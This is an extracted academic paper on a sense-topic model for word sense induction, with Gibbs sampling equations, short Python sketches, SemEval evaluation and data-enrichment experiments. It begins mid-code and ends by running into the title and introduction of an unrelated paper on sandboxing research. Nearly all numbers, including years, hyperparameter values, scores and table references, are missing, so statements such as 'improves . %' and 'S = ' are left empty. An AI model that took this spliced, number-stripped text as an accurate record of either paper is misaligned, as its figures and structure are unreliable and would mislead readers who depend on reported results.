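psi_s = rng.dirichlet(np.ones(W), size=2)   # sense-word multinomials, one row per sense

# Product parameterization: Pr(w | t=j, s=k) is proportional to psi_t[j, w] * psi_s[k, w].
unnormalized = psi_t[j] * psi_s[k]
Z_jk = unnormalized.sum()                   # normalization constant Z_{t_j, s_k}
proper = unnormalized / Z_jk                # properly normalized distribution over words

# The deficiency approximation treats Z_{t_j, s_k} as 1 and scores words with the
# unnormalized product directly; relative preferences among words are unchanged.
assert np.argmax(proper) == np.argmax(unnormalized)
```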
Parameters are indeed kept fixed during the E step of an EM algorithm, which is the usual setting in which deficiency is used. Only the M step is affected; it becomes an approximate M step by assuming the normalization constants equal 1 (Brown et al., ). However, here we use collapsed Gibbs sampling for posterior inference, and the analytic integration is disrupted by the presence of the normalization constants. To bypass this, we employ the standard approximation of deficient models that all normalization constants are 1, permitting us to use standard formulas for analytic integration of multinomial parameters with Dirichlet priors. Empirically, we found this "collapsed deficient Gibbs sampler" to slightly outperform a more principled approach based on EM, presumably due to the ability of collapsing to accelerate mixing.

During the sampling process, each sampler is run on the full set of instances for a target word, iterating through all word tokens in each instance. If the current word token is a global context word, we sample a new topic for it conditioned on all other latent variables across instances. If the current word is a local context word, we sample a new topic/sense pair for it, again conditioned on all other latent variable values.

We write the conditional posterior distribution over topics for global context word token i in instance d as Pr(t_g^{(i)} = j | d, t^{-i}, s, ·), where t_g^{(i)} = j is the topic assignment of token i, d is the current instance, t^{-i} is the set of topic assignments of all word tokens aside from i for instance d, s is the set of sense assignments for all local word tokens in instance d, and "·" stands for all other observed or known information, including all words, all Dirichlet hyperparameters, and all latent variable assignments in other instances. The conditional posterior can be computed by:

$$\Pr(t_g^{(i)} = j \mid d, \mathbf{t}^{-i}, \mathbf{s}, \cdot) \;\propto\; \underbrace{\frac{c^{dt}_{dj} + \alpha}{\sum_{k=1}^{T} c^{dt}_{dk} + T\alpha}}_{\Pr(t = j \mid d,\, \mathbf{t}^{-i},\, \mathbf{s},\, \cdot)} \;\; \underbrace{\frac{c^{wt}_{ij} + \alpha}{\sum_{k'=1}^{W_T} c^{wt}_{k'j} + W_T\,\alpha}}_{\Pr(w_g^{(i)} \mid t = j,\, \mathbf{t}^{-i},\, \mathbf{s},\, \cdot)} \qquad (4)$$

where we use the superscript dt as a mnemonic for "instance/topic" when counting topic assignments in an instance, and wt for "word/topic" when counting topic assignments for a word. c^{dt}_{dj} contains the number of times topic j is assigned to some word token in instance d, excluding the current word token w_g^{(i)}; c^{wt}_{ij} is the number of times word w_g^{(i)} is assigned to topic j, across all instances, excluding the current word token. W_T is the number of distinct word types in the full set of instances. We show the corresponding conditional posterior probabilities underneath each term; the count ratios are obtained using standard Dirichlet-multinomial collapsing.
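A minimal sketch of how Eq. (4) is used inside the sampler for a single global context word (hypothetical count arrays and function name, not the authors' code):

```python
import numpy as np

def sample_topic_for_global_word(word_id, d, c_dt, c_wt, alpha, rng):
    """Sample a topic for one global context word via Eq. (4).

    c_dt[d, j] : count of tokens in instance d currently assigned topic j
    c_wt[w, j] : count of tokens of word type w assigned topic j (all instances)
    Both tables are assumed to already exclude the current token.
    """
    T = c_dt.shape[1]
    W_T = c_wt.shape[0]                    # number of distinct word types

    # First factor: Pr(t = j | d, ...) from instance/topic counts.
    p_topic_given_doc = (c_dt[d] + alpha) / (c_dt[d].sum() + T * alpha)
    # Second factor: Pr(w | t = j, ...) from word/topic counts.
    p_word_given_topic = (c_wt[word_id] + alpha) / (c_wt.sum(axis=0) + W_T * alpha)

    probs = p_topic_given_doc * p_word_given_topic
    probs /= probs.sum()                   # normalize the unnormalized posterior
    return rng.choice(T, p=probs)

# Tiny usage example with toy counts (2 instances, 4 word types, 3 topics).
rng = np.random.default_rng(0)
c_dt = rng.integers(0, 5, size=(2, 3)).astype(float)
c_wt = rng.integers(0, 5, size=(4, 3)).astype(float)
new_topic = sample_topic_for_global_word(word_id=2, d=0, c_dt=c_dt, c_wt=c_wt,
                                          alpha=0.1, rng=rng)
```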
The conditional posterior distribution over topic/sense pairs for a local context word token w_ℓ^{(i)} can be computed by:

$$\begin{aligned}
\Pr(t_\ell^{(i)} = j, s_\ell^{(i)} = k \mid d, \mathbf{t}^{-i}, \mathbf{s}^{-i}, \cdot) \;\propto\;
& \underbrace{\frac{c^{dt}_{dj} + \alpha}{\sum_{k'=1}^{T} c^{dt}_{dk'} + T\alpha}}_{\Pr(t=j \mid d,\, \cdot)} \;
\underbrace{\frac{c^{wt}_{ij} + \alpha}{\sum_{k'=1}^{W_T} c^{wt}_{k'j} + W_T\,\alpha}}_{\Pr(w_\ell^{(i)} \mid t=j,\, \cdot)} \;
\underbrace{\frac{c^{ds}_{dk} + \alpha}{\sum_{k'=1}^{S} c^{ds}_{dk'} + S\alpha}}_{\Pr(s=k \mid d,\, \cdot)} \;
\underbrace{\frac{c^{ws}_{ik} + \alpha}{\sum_{k'=1}^{W_S} c^{ws}_{k'k} + W_S\,\alpha}}_{\Pr(w_\ell^{(i)} \mid s=k,\, \cdot)} \\
& \underbrace{\frac{c^{st}_{kj} + \alpha}{\sum_{k'=1}^{S} c^{st}_{k'j} + S\alpha}}_{\Pr(s=k \mid t=j,\, \cdot)} \;
\underbrace{\frac{c^{st}_{kj} + \alpha}{\sum_{k'=1}^{T} c^{st}_{kk'} + T\alpha}}_{\Pr(t=j \mid s=k,\, \cdot)} \;
\underbrace{\frac{c^{st}_{kj} + \alpha}{\sum_{k'=1}^{S}\sum_{j'=1}^{T} c^{st}_{k'j'} + ST\alpha}}_{\Pr(s=k,\, t=j \mid \cdot)}
\end{aligned} \qquad (5)$$

where c^{ds}_{dk} contains the number of times sense k is assigned to some local word token in instance d, excluding the current word token; c^{ws}_{ik} contains the number of times word w_ℓ^{(i)} is assigned to sense k, excluding the current token; and c^{st}_{kj} contains the number of times sense k and topic j are assigned to some local word token. W_S is the number of distinct local context word types across the collection.

Decoding

After the sampling process, we obtain a fixed-point estimate of the sense distribution (θ_s) for each instance d using the counts from our samples. Where we use θ_s^k to denote the probability of sense k for the instance, this amounts to:

$$\theta_s^{k} = \frac{c^{ds}_{dk}}{\sum_{k'=1}^{S} c^{ds}_{dk'}} \qquad (6)$$

This distribution is considered the final sense assignment distribution for the target word in instance d for the WSI task; the full distribution is fed to the evaluation metrics defined in the next section. To inspect what the model learned, we similarly obtain the sense-word distribution (ψ_s) from the counts as follows, where ψ_{s_k}^i is the probability of word type i given sense k:

$$\psi_{s_k}^{i} = \frac{c^{ws}_{ik}}{\sum_{i'=1}^{W_S} c^{ws}_{i'k}} \qquad (7)$$

Experimental Results

In this section, we evaluate our sense-topic model and compare it to several strong baselines and state-of-the-art systems.

Evaluation metrics: To evaluate WSI systems, Jurgens and Klapaftis ( ) propose two metrics: fuzzy B-Cubed and fuzzy normalized mutual information (NMI). They are each computed separately for each target word, then averaged across target words. Fuzzy B-Cubed prefers labeling all instances with the same sense, while fuzzy NMI prefers the opposite extreme of labeling all instances with distinct senses. Hence, we report both fuzzy B-Cubed (%) and fuzzy NMI (%) in our evaluation. For ease of comparison, we also report the geometric mean of the two metrics, which we denote by avg (we do not use an arithmetic mean because the effective ranges of the two metrics are substantially different).

The SemEval- task also provided a trial dataset (TRIAL) that consists of eight target ambiguous words, each with instances (Erk et al., ). We use it for preliminary experiments with our model and for tuning certain hyperparameters, and we evaluate final performance on the SemEval- dataset (TEST) with target words.

[Table: Performance on TRIAL for the sense-topic model with different numbers of senses (S). Columns: S, B-Cubed (%), NMI (%), Avg; best score in each column in bold.]

Hyperparameter tuning: We use TRIAL to analyze the performance of our sense-topic model under different settings for the numbers of senses (S) and topics (T); see the table above. We always set T = S for simplicity. We find that small S values work best, which is unsurprising considering the relatively small number of instances and the small size of each instance. When evaluating on TEST, we use S = (which gives the best avg results on TRIAL).
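The tuning criterion is simple enough to state as code. The sketch below assumes a hypothetical run_model(instances, S, T) that trains the sampler for a candidate setting and returns the two fuzzy scores; the names are illustrative, not taken from the paper's implementation:

```python
from math import sqrt

def avg_score(b_cubed, nmi):
    """Geometric mean of fuzzy B-Cubed and fuzzy NMI (the 'avg' column)."""
    return sqrt(b_cubed * nmi)

def tune_num_senses(trial_instances, candidate_S, run_model):
    """Pick S (with T tied to S) by the best geometric-mean score on TRIAL."""
    best_S, best_avg = None, float("-inf")
    for S in candidate_S:
        b_cubed, nmi = run_model(trial_instances, S=S, T=S)  # T = S for simplicity
        score = avg_score(b_cubed, nmi)
        if score > best_avg:
            best_S, best_avg = S, score
    return best_S
```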
Later, when we add larger context or more instances (see the data enrichment section below), tuning on TRIAL chooses a larger S value. During inference, the Gibbs sampler was run for , iterations for each target word, setting the first iterations as the burn-in period. In order to get a representative set of samples, every th sample (after burn-in) is saved to prevent correlations among samples. Due to the randomized nature of the inference procedure, all reported results are average scores over runs. The hyperparameters (α) for all Dirichlet priors in our model are set to the (untuned) value of . , following prior work on topic modeling (Griffiths and Steyvers, ; Heinrich, ).

Baselines: We include two naive baselines corresponding to the two extremes (biases) preferred by fuzzy B-Cubed and NMI, respectively: 1 sense (label each instance with the same single sense) and all distinct (label each instance with its own sense). We also consider two baselines based on LDA. We run LDA for each target word in TEST, using the set of instances as the set of documents, and treat the learned topics as induced senses. When setting the number of topics (senses), we use the gold-standard number of senses for each target word, making this baseline unreasonably strong. We run LDA both with full context (full) and local context (local), using the same window size as above ( words before and after the target word).

We also present results for the two best systems in the SemEval- task (according to fuzzy B-Cubed and fuzzy NMI, respectively): unimelb and AI-KU. As described in the related work, unimelb uses hierarchical Dirichlet processes (HDPs). It extracts , extra instances for each target word as training data from the ukWaC corpus (http://wacky.sslmit.unibo.it/doku.php?id=corpora), a web corpus of approximately billion tokens. Among all systems in the task, it performs best according to fuzzy B-Cubed. AI-KU is based on a lexical substitution method; a language model is built to identify lexical substitutes for target words from the dataset and the ukWaC corpus. It performed best among all systems according to fuzzy NMI.

Results: In the table below, we present results for these systems and compare them to our basic (i.e., without any data enrichment) sense-topic model with S = . According to both fuzzy B-Cubed and fuzzy NMI, our model outperforms the other WSI systems (LDA, AI-KU, and unimelb). Hence, we are able to achieve state-of-the-art results on the SemEval- task even when only using the single sentence of context given in each instance (while AI-KU and unimelb use large training sets from ukWaC). We found similar performance improvements when testing only on instances labeled with a single sense.

[Table: Performance on TEST for baselines and our sense-topic model; best score in each column in bold. Rows: 1 sense; all distinct; unimelb (adds instances); AI-KU (adds instances); LDA (local), no enrichment; LDA (full), no enrichment; LDA (full) with actual context added; word embedding product, no enrichment; our sense-topic model with no enrichment, with ukWaC context, with actual context, with added instances, and with weighting by similarity. Columns: Fuzzy B-Cubed %, Fuzzy NMI %, Avg.]

Bidirectionality analysis: To measure the impact of the bidirectional dependency between the topic and sense variables in our model, we also evaluate the performance of our sense-topic model when dropping one of the directions. In the table below, we compare their performance with our full sense-topic model on TEST. Both unidirectional models perform worse than the full model, and dropping t → s hurts more. This result verifies our intuition that topics help narrow down the set of likely senses, and suggests that bidirectional modeling between topic and sense is desirable for WSI.

[Table: Performance on TEST for the sense-topic model with ablation of links between sense and topic variables. Rows: drop s → t, drop t → s, full. Columns: B-Cubed (%), NMI (%), Avg.]

In subsequent sections, we investigate several ways of exploiting additional data to build better-performing sense-topic models.

Unsupervised Data Enrichment

The primary signal used by our model is word co-occurrence information across instances. If we enrich the instances, we can have more robust co-occurrence statistics. The SemEval- dataset may be too small to induce meaningful senses, since there are only about instances for each target word, and each instance only contains one sentence. This is why most shared task systems added instances from external corpora.

In this section, we consider three unsupervised ways of enriching data and measure their impact on performance. First, we augment the context of each instance in our original dataset while keeping the number of instances fixed (adding context). Second, we collect more instances of each target word from ukWaC, similar to the AI-KU and unimelb systems (adding instances). Third, we change the distribution of words in each instance based on their similarity to the target word (weighting by word similarity). Throughout, we make use of word embeddings. We trained -dimensional skip-gram vectors (Mikolov et al., ) on English Wikipedia (tokenized/lowercased, resulting in . B tokens of text) using window size , hierarchical softmax, and no downsampling. (We used a minimum count cutoff of during training, then only retained vectors for the most frequent , word types, averaging the rest to get a vector for unknown words.)

Adding Context

The first way we explore of enriching data is to add a broader context for each instance while keeping the number of instances unchanged. This introduces more word tokens into the set of global context words, while keeping the set of local context words mostly unchanged, as the window size we use is typically smaller than the length of the original instance. With more global context words, the model has more evidence to learn coherent topics, which could also improve the induced senses via the connection between sense and topic.

The ideal way of enriching context for an instance is to add its actual context from the corpus from which it was extracted. To do this for the SemEval- task, we find each instance in the OANC and retrieve three sentences before the instance and three sentences after. While not provided for the SemEval task, it is reasonable to assume this larger context in many real-world applications, such as information retrieval and machine translation of documents.

However, in other settings, the corpus may only have a single sentence containing the target word (e.g., search queries or machine translation of sentences). To address this, we find a semantically-similar sentence from the English ukWaC corpus and append it to the instance as additional context. For each instance in the original dataset, we extract its most similar sentence that contains the same target word and add it to increase its set of global context words.
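A minimal sketch of this retrieval step follows (the similarity computation itself is spelled out in the next paragraph). The embedding lookup and candidate sentences here are placeholders; any pre-trained word-vector table keyed by word type would do:

```python
import numpy as np

def sentence_vector(tokens, embeddings, dim):
    """Represent a sentence by summing the vectors of its tokens (unknown words skipped)."""
    vec = np.zeros(dim)
    for tok in tokens:
        if tok in embeddings:
            vec += embeddings[tok]
    return vec

def cosine(u, v):
    denom = np.linalg.norm(u) * np.linalg.norm(v)
    return 0.0 if denom == 0 else float(np.dot(u, v) / denom)

def most_similar_sentence(instance_tokens, target_word, candidates, embeddings, dim):
    """Return the candidate sentence (a token list) containing the target word that is
    closest, by cosine similarity of summed embeddings, to the given instance."""
    inst_vec = sentence_vector(instance_tokens, embeddings, dim)
    best, best_sim = None, float("-inf")
    for sent in candidates:                    # e.g., sentences drawn from ukWaC
        if target_word not in sent:
            continue
        sim = cosine(inst_vec, sentence_vector(sent, embeddings, dim))
        if sim > best_sim:
            best, best_sim = sent, sim
    return best
```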
to compute similarity, we first represent in- stances and ukwac sentences by summing the word embeddings across their word tokens, then compute cosine similarity. the ukwac sentence (s∗) with the highest cosine similarity to each original instance (d) is appended to that instance: s∗ = arg maxs∈ukwac sim(d,s) results since the vocabulary has increased, we expect we may need larger values for s and t . on trial, we find best performance for s = , so we run on test with this value. performance is shown in table (rows and ). these two meth- ods have higher avg scores than all others. both their fuzzy b-cubed and nmi improvements over the baselines and previous wsi systems are statisti- cally significant, as measured by a paired bootstrap test (p < . ; efron and tibshirani, ). it is unsurprising that we find best performance with actual context. interestingly, however, we can achieve almost the same gains when automati- cally finding relevant context from a different cor- pus. thus, even in real-world settings where we only have a single sentence of context, we can induce substantially better senses by automatically broad- ening the global context in an unsupervised manner. as a comparative experiment, we also evaluate the performance of lda when adding actual con- text (table , row ). compared with lda with full context (full) in row , performance is slightly improved, perhaps due to the fact that longer con- texts induce more accurate topics. however, those topics are not necessarily related to senses, which is why lda with only local context actually per- forms best among all three lda models. thus we see that merely adding context does not necessarily help topic models for wsi. importantly, since our model includes both sense and topic, we are able to leverage the additional context to learn better top- ics while also improving the quality of the induced senses, leading to our strongest results. examples we present examples to illustrate our sense-topic model’s advantage over lda and the further improvement when adding actual context. consider instances ( ) and ( ) below, with target word occurrences in bold: ( ) nigeria then sent troops to challenge the coup, evi- dently to restore the president and repair nigeria’s corrupt image abroad. (image% : : ::/ ) ( ) when asked about the bible’s literal account of creation, as opposed to the attractive concept of divine creation, every major republican presiden- tial candidate—even bauer—has squirmed, ducked, and tried to steer the discussion back to “faith,” “morals,” and the general idea that humans “were created in the image of god.” (image% : : ::/ image% : : ::/ ) both instances share the common word stem pres- ident. lda uses this to put these two instances into the same topic (i.e., sense). in our sense-topic model, president is a local context word in instance ( ) but a global context word in instance ( ). so the effect of sharing words is decreased, and these two instances are assigned to different senses by our model. according to the gold standard, the two in- stances are annotated with different senses, so our sense-topic model provides the correct prediction. next, consider instances ( ), ( ), and ( ): ( ) i have recently deliberately begun to use variations of “kick ass” and “bites x in the ass” because they are colorful, evocative phrases; because, thanks to south park, ass references are newly familiar and hilarious and because they don’t evoke partic- ularly vivid mental image of asses any longer. 
(im- age% : : ::/ ) ( ) also, playing video games that require rapid mental rotation of visual image enhances the spatial test scores of boys and girls alike. (image% : : ::/ ) ( ) practicing and solidifying modes of representa- tion, piaget emphasized, make it possible for the child to free thought from the here and now; cre- ate larger images of reality that take into account past, present, and future; and transform those im- age mentally in the service of logical thinking. (im- age% : : ::/ ) in the gold standard, instances ( ) and ( ) have dif- ferent senses while ( ) and ( ) have the same sense. however, sharing the local context word “mental” this is the gold standard sense label, where im- age% : : :: indexes the wordnet senses, and is the score assigned by the annotators.the possible range of a score is [ , ]. triggers both lda and our sense-topic model to as- sign them to the same sense label with high proba- bility. when augmenting the instances by their real contexts, we have a better understanding about the topics. instance ( ) is about phrase variations, in- stance ( ) is about enhancing boys’ spatial skills, while instance ( ) discusses the effect of make- believe play for children’s development. when lda is run with the actual context, it leaves ( ) and ( ) in the same topic (i.e., sense), while as- signing ( ) into another topic with high probability. this could be because ( ) and ( ) both relate to child development, and therefore lda considers them as sharing the same topic. however, topic is not the same as sense, especially when larger contexts are available. our sense-topic model built on the ac- tual context makes correct predictions, leaving ( ) and ( ) into the same sense cluster while labeling ( ) with a different sense. . adding instances we also consider a way to augment our dataset with additional instances from an external corpus. we have no gold standard senses for these instances, so we will not evaluate our model on them; they are merely used to provide richer co-occurrence statis- tics about the target word so that we can perform better on the instances on which we evaluate. if we added randomly-chosen instances (contain- ing the target word), we would be concerned that the learned topics and senses may not reflect the distri- butions of the original instance set. so we only add instances that are semantically similar to instances in our original set (moore and lewis, ; chambers and jurafsky, ). also, to avoid changing the original sense distribution by adding too many in- stances, we only add a single instance for each orig- inal instance. as in § . , for each instance in the original dataset, we find the most similar sentence in ukwac for each instance using word embeddings and add it into the dataset. therefore, the number of instances is doubled, and we use the enriched dataset for our sense-topic model. results similarly to § . , on trial, we find best performance for s = , so we run on test with this value. as shown in table (row ), this improves fuzzy b-cubed by . %, but fuzzy nmi is lower, making the avg worse than the original model. a possible reason for this is that the sense distribution in the added instances disturbs that in the original set of instances, even though we picked the most semantically similar ones to add. . weighting by word similarity another approach is inspired by the observation that each local context token is treated equally in terms of its contribution to the sense. 
However, our intuition is that certain tokens are more indicative than others. Consider the target word window. Since glass evokes a particular sense of window, we would like to weight it more highly than, say, day.

To measure word relatedness, we use the cosine similarity of word embeddings. We (softly) replicate each local context word according to its exponentiated cosine similarity to the target word. The result is that the local context in each instance is modified to contain fewer occurrences of unrelated words and more occurrences of related words. If each cosine similarity is zero (so every weight is one), we obtain our original sense-topic model. (Cosine similarities range from −1 to 1, so we use exponentiation to ensure we always use positive counts.) During inference, the posterior sense distribution for instance d is now given by:

$$\Pr(s = k \mid d, \cdot) = \frac{\sum_{w \in d_\ell} \exp(\mathrm{sim}(w, w^*)) \, [s_w = k] \; + \; \alpha}{\sum_{w' \in d_\ell} \exp(\mathrm{sim}(w', w^*)) \; + \; S\alpha} \qquad (8)$$

where d_ℓ is the set of local context tokens in d, sim(w, w*) is the cosine similarity between w and the target word w*, and [s_w = k] is an indicator returning one when w is assigned to sense k and zero otherwise. The posterior distribution of sampling a token of word w_i from sense k becomes:

$$\frac{c^{ws}_{ik} \, \exp(\mathrm{sim}(w_i, w^*)) + \alpha}{\sum_{i'=1}^{W_S} c^{ws}_{i'k} \, \exp(\mathrm{sim}(w_{i'}, w^*)) + W_S\,\alpha} \qquad (9)$$

where c^{ws}_{ik} counts the number of times w_i is assigned to sense k.

Results: We again use TRIAL to tune S (and still use T = S). We find the best TRIAL performance at S = ; this is unsurprising since this approach does not change the vocabulary. In the results table, we present results on TEST with this setting. We also report an additional baseline, "word embedding product," where we represent each instance by multiplying (element-wise) the word vectors of all local context words, and then feed the instance vectors into the fuzzy c-means clustering algorithm (Pal and Bezdek, ), with c = . Compared to this baseline, our approach improves . % on average; compared with results for the original sense-topic model, this approach improves . % on average.

[Table: Top terms for each sense induced for the noun image by the sense-topic model and when weighting local context words by similarity (same S for both).
Sense-topic model: (a) include, depict, party, paint, visual; (b) zero, manage, company, culture, figure; (c) create, clinton, people, american, popular.
+ weight by similarity: (a) depict, create, culture, mental, include; (b) picture, visual, pictorial, matrix, movie; (c) public, means, view, american, story.]

In the table above we show the top terms for each sense induced for image, both for the original sense-topic model and when additionally weighting by similarity. We find that the original model provides less distinguishable senses, as it is difficult to derive separate senses from these top terms. In contrast, the senses learned from the model with weighted similarities are more distinct: one relates to mental representation, another to visual representation produced on a surface, and a third to the general impression that something presents to the public.

Conclusions and Future Work

We presented a novel sense-topic model for the problem of word sense induction. We considered sense and topic as distinct latent variables, defining a model that generates global context words using topic variables and local context words using both topic and sense variables. Sense and topic are related using a bidirectional dependency with a robust parameterization based on deficient modeling.
we explored ways of enriching data using word embeddings from neural language models and exter- nal corpora. we found enriching context to be most effective, even when the original context of the in- stance is not available. evaluating on the semeval- wsi dataset, we demonstrate that our model yields significant improvements over current state- of-the-art systems, giving . % fuzzy b-cubed and . % fuzzy nmi in our best setting. moreover, we find that modeling both sense and topic is critical to enable us to effectively exploit broader context, showing that lda does not improve when each in- stance is enriched by actual context. in future work, we plan to further explore the space of sense-topic models, including non-deficient models. one possibility is to use “switching vari- ables” (paul and girju, ) to choose whether to generate each word from a topic or sense, with a stronger preference to generate from senses closer to the target word. another possibility is to use locally- normalized log-linear distributions and include fea- tures pairing words with particular senses and topics, rather than redundant generative steps. appendix a the plate diagram for the complete sense-topic model is shown in figure . figure : plate notation for the proposed sense-topic model with all variables (except α, the fixed dirichlet hyperparameter used as prior for all multinomial distri- butions). each instance has topic mixing proportions θt and sense mixing proportions θs. the instance set shares sense/topic parameter θst, topic-sense distribution θs|t, sense-topic distribution θt|s, topic-word distribution ψt, and sense-word distribution ψs. acknowledgments we thank the editor and the anonymous reviewers for their helpful comments. this research was par- tially supported by nih lm . the opinions expressed in this work are those of the authors and do not necessarily reflect the views of the funding agency. references e. agirre and a. soroa. . semeval- task : evaluating word sense induction and discrimination systems. in proc. of semeval, pages – . c. akkaya, j. wiebe, and r. mihalcea. . utilizing semantic composition in distributional semantic mod- els for word sense discrimination and word sense dis- ambiguation. in proc. of icsc, pages – . m. bansal, k. gimpel, and k. livescu. . tailoring continuous word representations for dependency pars- ing. in proc. of acl, pages – . o. baskaya, e. sert, v. cirik, and d. yuret. . ai- ku: using substitute vectors and co-occurrence mod- eling for word sense induction and disambiguation. in proc. of semeval, pages – . y. bengio, r. ducharme, p. vincent, and c. janvin. . a neural probabilistic language model. j. mach. learn. res., : – . d. m. blei, a. y. ng, and m. i. jordan. . la- tent dirichlet allocation. j. mach. learn. res., : – . j. boyd-graber and d. m. blei. . putop: turning predominant senses into a topic model for word sense disambiguation. in proc. of semeval, pages – . j. boyd-graber, d. m. blei, and x. zhu. . a topic model for word sense disambiguation. in proc. of emnlp-conll, pages – . s. brody and m. lapata. . bayesian word sense induction. in proc. of eacl, pages – . p. f. brown, s. a. della pietra, v. j. della pietra, and r. l. mercer. . the mathematics of statistical machine translation: parameter estimation. computa- tional linguistics, ( ): – . j. f. cai, w. s. lee, and y. w. teh. . improving word sense disambiguation using topic features. in proc. of emnlp-conll, pages – . m. carpuat and d. wu. . word sense disambigua- tion vs. 
statistical machine translation. in proc. of acl, pages – . m. carpuat and d. wu. . improving statistical ma- chine translation using word sense disambiguation. in proc. of emnlp-conll, pages – . n. chambers and d. jurafsky. . template-based information extraction without the templates. in proc. of acl, pages – . r. collobert, j. weston, l. bottou, m. karlen, k. kavukcuoglu, and p. kuksa. . natural lan- guage processing (almost) from scratch. j. mach. learn. res., : – . p. dhillon, j. rodu, d. foster, and l. ungar. . two step cca: a new spectral method for estimating vec- tor models of words. in icml, pages – . b. dorow and d. widdows. . discovering corpus- specific word senses. in proc. of eacl, pages – . b. efron and r. j. tibshirani. . an introduction to the bootstrap, volume . crc press. k. erk and d. mccarthy. . graded word sense as- signment. in proc. of emnlp, pages – . k. erk, d. mccarthy, and n. gaylord. . investi- gations on word senses and word usages. in proc. of acl, pages – . s. geman and d. geman. . stochastic relax- ation, gibbs distributions, and the bayesian restoration of images. ieee trans. pattern anal. mach. intell., ( ): – . t. l. griffiths and m. steyvers. . finding scien- tific topics. proc. of the national academy of sciences of the united states of america, (suppl ): – . d. heckerman, d. m. chickering, c. meek, r. roun- thwaite, and c. kadie. . dependency networks for inference, collaborative filtering, and data visual- ization. j. mach. learn. res., : – . g. heinrich. . parameter estimation for text analy- sis. technical report. s. hisamoto, k. duh, and y. matsumoto. . an em- pirical investigation of word representations for pars- ing the web. in anlp. n. ide and k. suderman. . the american national corpus first release. in proc. of lrec, pages – . d. jurgens and i. klapaftis. . semeval- task : word sense induction for graded and non-graded senses. in proc. of semeval, pages – . d. jurgens. . embracing ambiguity: a comparison of annotation methodologies for crowdsourcing word sense labels. in proc. of naacl, pages – . d. klein and c. d. manning. . a generative constituent-context model for improved grammar in- duction. in proc. of acl, pages – . j. h. lau, p. cook, d. mccarthy, d. newman, and t. baldwin. . word sense induction for novel sense detection. in proc. of eacl, pages – . j. h. lau, p. cook, and t. baldwin. . unimelb: topic modelling-based word sense induction. in proc. of semeval, pages – . l. li, b. roth, and c. sporleder. . topic models for word sense disambiguation and token-based idiom detection. in proc. of acl, pages – . y. maron, e. bienenstock, and m. james. . sphere embedding: an application to part-of-speech induc- tion. in advances in nips . j. may and k. knight. . syntactic re-alignment models for machine translation. in proc. of emnlp- conll, pages – . t. mikolov, k. chen, g. corrado, and j. dean. . efficient estimation of word representations in vector space. in proc. of iclr. g. a. miller, r. beckwith, c. fellbaum, d. gross, and k. j. miller. . wordnet: an on-line lexical database. international journal of lexicography, ( ). a. mnih and g. hinton. . three new graphical models for statistical language modelling. in proc. of icml, pages – . r. c. moore and w. lewis. . intelligent selection of language model training data. in proc. of acl, pages – . n. r. pal and j. c. bezdek. . on cluster validity for the fuzzy c-means model. trans. fuz sys., : – . p. pantel and d. lin. . discovering word senses from text. in proc. of kdd, pages – . r. j. 
passonneau, a. salleb-aoussi, v. bhardwaj, and n. ide. . word sense annotation of polysemous words by multiple annotators. in proc. of lrec. m. paul and r. girju. . cross-cultural analysis of blogs and forums with mixed-collection topic models. in proc. of emnlp, pages – . a. purandare and t. pedersen. . word sense dis- crimination by clustering contexts in vector and simi- larity spaces. in proc. of conll, pages – . m. sahlgren. . the word-space model: us- ing distributional analysis to represent syntagmatic and paradigmatic relations between words in high- dimensional vector spaces. ph.d. dissertation, stock- holm university. h. schütze. . automatic word sense discrimination. comput. linguist., ( ): – . y. w. teh, m. i. jordan, m. j. beal, and d. m. blei. . hierarchical dirichlet processes. journal of the amer- ican statistical association, : – . k. toutanova and m. johnson. . a bayesian lda- based model for semi-supervised part-of-speech tag- ging. in advances in nips . j. turian, l. ratinov, and y. bengio. . word rep- resentations: a simple and general method for semi- supervised learning. in proc. of acl, pages – . j. véronis. . hyperlex: lexical cartography for in- formation retrieval. computer speech & language, ( ): – . d. vickrey, l. biewald, m. teyssier, and d. koller. . word-sense disambiguation for machine translation. in proc. of hlt-emnlp, pages – . e. m. voorhees. . using wordnet to disambiguate word senses for text retrieval. in proc. of sigir, pages – . x. yao and b. van durme. . nonparamet- ric bayesian word sense induction. in proc. of textgraphs- : graph-based methods for natural lan- guage processing, pages – . a systematic analysis of the science of sandboxing submitted october accepted december published january corresponding author michael maass, mmaass@andrew.cmu.edu academic editor cynthia irvine additional information and declarations can be found on page doi . /peerj-cs. copyright maass et al. distributed under creative commons cc-by . open access a systematic analysis of the science of sandboxing michael maass , adam sales , benjamin chung and joshua sunshine institute for software research, school of computer science, carnegie mellon university, pittsburgh, pa, united states statistics department, carnegie mellon university, pittsburgh, pa, united states abstract sandboxes are increasingly important building materials for secure software systems. in recognition of their potential to improve the security posture of many systems at various points in the development lifecycle, researchers have spent the last several decades developing, improving, and evaluating sandboxing techniques. what has been done in this space? where are the barriers to advancement? what are the gaps in these efforts? we systematically analyze a decade of sandbox research from five top-tier security and systems conferences using qualitative content analysis, statistical clustering, and graph-based metrics to answer these questions and more. we find that the term “sandbox” currently has no widely accepted or acceptable definition. we use our broad scope to propose the first concise and comprehensive definition for “sandbox” that consistently encompasses research sandboxes. we learn that the sandboxing landscape covers a range of deployment options and policy enforce- ment techniques collectively capable of defending diverse sets of components while mitigating a wide range of vulnerabilities. 
researchers consistently make security, performance, and applicability claims about their sandboxes and tend to narrowly define the claims to ensure they can be evaluated. those claims are validated using multi-faceted strategies spanning proof, analytical analysis, benchmark suites, case studies, and argumentation. however, we find two cases for improvement: ( ) the arguments researchers present are often ad hoc and ( ) sandbox usability is mostly uncharted territory. we propose ways to structure arguments to ensure they fully support their corresponding claims and suggest lightweight means of evaluating sandbox usability. subjects security and privacy, operating systems, software engineering keywords sandboxing, qualitative content analysis, software protection, access control, security, security validation introduction sandboxes can be found where software components must be used but cannot currently be verified or trusted. sandboxed components are often feared to be either malicious or vulnerable to attack. for example, popular browser engines (e.g., google chrome and internet explorer), productivity software (e.g., microsoft word and adobe reader), and operating system kernels (e.g., windows ) have all been sandboxed to varying degrees. virtual machines, which run software on simulated hardware separate from the rest of the how to cite this article maass et al. ( ), a systematic analysis of the science of sandboxing. peerj comput. sci. :e ; doi . /peerj-cs. mailto:mmaass@andrew.cmu.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. host system, are commonly used in malware analysis to contain malicious computations (e.g., cuckoo) and sandboxes are used in mobile ecosystems (e.g., android) to limit the havoc malicious applications can wreak on a device. sandboxes provide some salvation in a world full of complex components: instead of vetting intractably enigmatic software systems, sandbox them and vet the relatively simple sandbox. what else do 